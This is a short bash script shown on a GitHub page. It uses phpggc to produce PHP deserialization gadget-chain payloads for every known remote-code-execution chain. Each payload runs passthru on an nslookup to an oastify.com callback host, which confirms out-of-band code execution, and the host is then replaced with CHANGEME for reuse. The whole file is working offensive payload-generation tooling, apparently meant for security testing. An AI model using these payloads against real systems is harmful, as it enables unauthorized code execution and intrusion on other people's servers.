-
Notifications
You must be signed in to change notification settings - Fork 11
/
genpayloads.sh
executable file
·27 lines (26 loc) · 1.33 KB
/
genpayloads.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#!/bin/bash
# based on https://gist.github.com/honoki/029425e61e829a9344558c8587c29f0f#file-phpggc-generate-payloads-sh
function="passthru"
command="nslookup poi-slinger.aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.oastify.com"
options="-s"
~/phpggc/phpggc -l | /bin/grep RCE | cut -d' ' -f1 | xargs -L 1 ~/phpggc/phpggc -i | /bin/grep 'phpggc ' --line-buffered |
while read line; do
gadget=$(echo $line | cut -d' ' -f2) &&
if echo $line | /bin/grep -q "<function> <parameter>"; then
echo -e "\n"
echo $gadget "<function> <parameter>"
~/phpggc/phpggc $options $gadget "$function" "$command" | sed 's/poi-slinger.aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.oastify.com/CHANGEME/g' | jq -aR .
elif echo $line | /bin/grep -q "<code>"; then
echo -e "\n"
echo $gadget "<code>"
~/phpggc/phpggc $options $gadget "$function('$command');" | sed 's/poi-slinger.aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.oastify.com/CHANGEME/g' | jq -aR .
elif echo $line | /bin/grep -q "<command>"; then
echo -e "\n"
echo $gadget "<command>"
~/phpggc/phpggc $options $gadget "$command" | sed 's/poi-slinger.aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.oastify.com/CHANGEME/g' | jq -aR .
else
echo -e "\n"
echo $gadget
~/phpggc/phpggc $options $gadget | sed 's/poi-slinger.aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.oastify.com/CHANGEME/g' | jq -aR .
fi;
done